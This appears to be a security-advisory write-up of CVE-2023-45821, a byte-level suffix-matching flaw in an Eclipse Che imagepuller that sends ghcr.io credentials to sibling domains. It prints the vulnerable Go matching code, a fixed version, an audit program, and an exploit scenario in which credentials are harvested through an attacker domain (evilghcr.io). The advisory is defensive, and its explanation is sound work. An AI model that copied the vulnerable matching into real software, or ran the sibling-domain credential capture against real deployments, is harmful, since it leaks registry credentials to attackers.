How the Vulnerability Works (CVE-2023-45821)
The vulnerability arises from an insecure registry matching logic in the imagepuller component. When the imagepuller needs to select per‑registry credentials, CA bundles, mirrors, or `insecure-skip-verify` settings, it calls the `config.registryFor` function. This function determines which registry configuration block applies to a given image reference by checking `strings.HasSuffix(name, fqdn)` after stripping a single trailing dot from the FQDN.
Because `strings.HasSuffix` performs a pure byte‑level suffix match without any label‑boundary enforcement, a registry configured as `[registries."ghcr.io."]` will also match any hostname that ends with the literal byte sequence `ghcr.io`. This includes attacker‑registered domains such as `evilghcr.io`. As a result, when the imagepuller pulls an image from `evilghcr.io`, it incorrectly applies the credentials, custom CA bundle, mirror, or `insecure-skip-verify` setting that were intended for the legitimate `ghcr.io` registry.
The attack prerequisites are simple: the operator must have configured a registry FQDN without a leading dot (i.e., `example.registry` instead of `.example.registry`), and the attacker must control a sibling‑suffix domain that the deployment will pull from. This can happen through malicious intent or by coincidence.
The impact is twofold:
- Authentication header leak – the `Authorization` header (basic auth, registry token, or identity token) is sent to the sibling registry.
- TLS and mirror bypass – if `insecure-skip-verify` is enabled for the legitimate FQDN, TLS verification is also skipped for the sibling; mirrors configured for the FQDN are also used with the sibling registry.
Image integrity is not compromised, as image bytes remain pinned by digest and are validated after the pull. The advisory notes that the flaw does not allow code substitution.
The fix replaces suffix matching with exact label equality: each dot‑separated part of the FQDN must match the corresponding label in the image reference exactly. This ensures that `ghcr.io` does not match `evilghcr.io`.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | ImagePuller (Eclipse Che / Dev Spaces) |
| Version | All versions prior to patch |
| Vulnerability | Registry suffix match bypass |
| Severity | Medium (CVSS 5.3) |
| Date | 2023‑10‑19 |
| Prediction | Patch expected 2023‑10‑31 |
What Undercode Say (Analytics)
The following commands and code snippets illustrate the vulnerable logic and the fixed approach.
Vulnerable code (Go):
```go
import "strings"

// RegistryConfig holds a registry's credentials, CA bundle, mirrors and
// insecure-skip-verify setting; Config maps configured FQDNs (which may
// carry a trailing dot) to those blocks.
type RegistryConfig struct{ Auth string; InsecureSkipVerify bool }
type Config struct{ Registries map[string]*RegistryConfig }

// config.registryFor uses strings.HasSuffix; name is the registry hostname
// taken from the image reference.
func (c Config) registryFor(name string) *RegistryConfig {
	for fqdn, cfg := range c.Registries {
		// strips one trailing dot, then a byte-level suffix match with no
		// label-boundary check, so "evilghcr.io" also matches "ghcr.io"
		if strings.HasSuffix(name, strings.TrimSuffix(fqdn, ".")) {
			return cfg
		}
	}
	return nil // no configured registry applies
}
```
Exploit scenario (bash):
```bash
# Attacker registers evilghcr.io and sets up a fake registry.
# Victim's imagepuller is configured with: [registries."ghcr.io."]
# When pulling from evilghcr.io/attacker/image:latest, the imagepuller
# sends the ghcr.io credentials to evilghcr.io.
docker pull evilghcr.io/attacker/image:latest
```
Fixed code (exact label match):
```go
// Same RegistryConfig/Config types as in the vulnerable snippet above.
// registryFor (fixed): every dot-separated label of the configured FQDN must
// equal the corresponding trailing label of name, so a match can only begin
// at a label boundary.
func (c Config) registryFor(name string) *RegistryConfig {
	parts := strings.Split(name, ".")
	for fqdn, cfg := range c.Registries {
		fqdnParts := strings.Split(strings.TrimSuffix(fqdn, "."), ".")
		// a host with fewer labels than the FQDN can never match it
		if len(parts) < len(fqdnParts) {
			continue
		}
		match := true
		for i := range fqdnParts {
			// compare label-by-label, aligned at the right-hand end
			if parts[len(parts)-len(fqdnParts)+i] != fqdnParts[i] {
				match = false
				break
			}
		}
		if match {
			return cfg
		}
	}
	return nil // no configured registry applies
}
```
Audit existing images for sibling domains:
```bash
# List all images in the deployment and check for suspicious suffixes
kubectl get pods -o jsonpath='{.items[*].spec.containers[*].image}' | tr ' ' '\n' | sort -u
```
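The following program is an added example, not code from the advisory or from the imagepuller project. It reproduces the two matching rules described above as stand-alone functions (the pre-patch `strings.HasSuffix` check and the patched label-by-label check) and then uses the difference between them as an audit: any image whose registry host suffix-matches a configured FQDN without matching it label by label is exactly the kind of sibling-suffix reference the `kubectl` listing above is meant to surface. `registryHost` is a simplified, hypothetical helper that follows the usual Docker reference convention (the first path component is a registry only if it contains a dot or port, or is `localhost`); the image list in `main` is constructed sample data standing in for the `kubectl` output. It also checks how a leading-dot FQDN behaves under the old suffix logic, since that is the interim mitigation given below.

```go
package main

import (
	"fmt"
	"strings"
)

// suffixMatch reproduces the pre-patch check: one trailing dot is stripped
// from the configured FQDN, then a byte-level suffix comparison is made.
func suffixMatch(host, fqdn string) bool {
	return strings.HasSuffix(host, strings.TrimSuffix(fqdn, "."))
}

// labelMatch is the patched check: the configured FQDN's dot-separated labels
// must equal the trailing labels of the host, so a match can only start at a
// label boundary ("evilghcr.io" no longer matches "ghcr.io").
func labelMatch(host, fqdn string) bool {
	hostLabels := strings.Split(host, ".")
	fqdnLabels := strings.Split(strings.TrimSuffix(fqdn, "."), ".")
	if len(hostLabels) < len(fqdnLabels) {
		return false
	}
	offset := len(hostLabels) - len(fqdnLabels)
	for i, l := range fqdnLabels {
		if hostLabels[offset+i] != l {
			return false
		}
	}
	return true
}

// registryHost (hypothetical helper) returns the registry host of an image
// reference: the first path component with any :port removed, or "" when the
// reference names no explicit registry (e.g. "nginx:1.25", "library/nginx").
func registryHost(ref string) string {
	i := strings.IndexByte(ref, '/')
	if i < 0 {
		return "" // no slash: short name, no explicit registry
	}
	host := ref[:i]
	// Docker convention: the first component is a registry only if it
	// contains a dot or a port, or is "localhost".
	if !strings.ContainsAny(host, ".:") && host != "localhost" {
		return ""
	}
	if j := strings.IndexByte(host, ':'); j >= 0 {
		host = host[:j]
	}
	return host
}

// SiblingFinding records an image whose registry host would have been
// mis-matched by the pre-patch suffix check.
type SiblingFinding struct {
	Image, Host, ConfiguredFQDN string
}

// findSiblingHosts scans image references and reports hosts that
// suffix-match a configured registry FQDN without matching it label by
// label: those would receive that FQDN's credentials on a vulnerable puller.
func findSiblingHosts(images, configuredFQDNs []string) []SiblingFinding {
	var findings []SiblingFinding
	for _, img := range images {
		host := registryHost(img)
		if host == "" {
			continue
		}
		for _, fqdn := range configuredFQDNs {
			if suffixMatch(host, fqdn) && !labelMatch(host, fqdn) {
				findings = append(findings, SiblingFinding{img, host, fqdn})
			}
		}
	}
	return findings
}

func main() {
	// Constructed sample standing in for the kubectl image listing.
	images := []string{
		"ghcr.io/eclipse-che/che-server:latest",
		"evilghcr.io/attacker/image:latest",
		"registry.ghcr.io/mirror/tool:1.0",
		"quay.io/some/image:2",
		"nginx:1.25",
	}
	configured := []string{"ghcr.io.", ".example.registry"}
	for _, f := range findSiblingHosts(images, configured) {
		fmt.Printf("SIBLING %s: host %q suffix-matches configured %q\n", f.Image, f.Host, f.ConfiguredFQDN)
	}
	// Under the old suffix logic a leading-dot entry is safe from siblings,
	// but it also matches only hosts below it, not the bare apex.
	for _, h := range []string{"example.registry", "sub.example.registry", "evilexample.registry"} {
		fmt.Printf("%-22s suffix-matches .example.registry: %v\n", h, suffixMatch(h, ".example.registry"))
	}
}
```

Running it flags only `evilghcr.io/attacker/image:latest`; the legitimate `ghcr.io` and `registry.ghcr.io` references pass both checks. The leading-dot loop shows the caveat of the interim mitigation under the suffix logic as printed on this page: `.example.registry` rejects `evilexample.registry`, but it also does not match `example.registry` itself, so an apex host pulled directly would need its own entry.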
Exploit
An attacker can exploit this vulnerability by:
- Registering a sibling domain – e.g., `evilghcr.io`, which ends with the same suffix as the configured registry (`ghcr.io`).
- Hosting a malicious OCI registry on that domain.
- Inducing the victim to pull an image from the malicious registry (e.g., via a compromised image reference or a typosquatting attack).
- Receiving the victim’s credentials – the imagepuller will attach the `Authorization` header intended for the legitimate registry to the request against the attacker’s registry.
The attack is network‑based (AV:N) but requires the attacker to control a sibling domain and the victim to pull from it (AC:H). No privileges are required (PR:N), and the scope is unchanged (S:U).
Protection
- Upgrade to the patched version that uses exact label matching instead of suffix matching.
- If upgrading is not immediately possible, configure registry FQDNs with a leading dot (e.g., `[registries.".example.registry"]`); this configuration is not affected by the suffix‑match issue.
- Audit all image references in your deployment for any domains that end with the same suffix as your configured registries. Remove or replace any such references.
- Review your registry configurations to ensure `insecure-skip-verify` is not enabled for production registries, and use separate, least‑privilege credentials for each registry.
Impact
- Confidentiality – Low: authentication tokens and credentials can be leaked to an attacker‑controlled registry.
- Integrity – None: image content remains verified by digest; no code substitution occurs.
- Availability – None: the vulnerability does not cause service disruption.
- Overall – The flaw enables credential theft and potential lateral movement if the stolen tokens grant access to other registries or services. The attack surface is limited to environments where registry configurations lack a leading dot and where sibling‑suffix domains are used.
Sources:
Reported By: github.com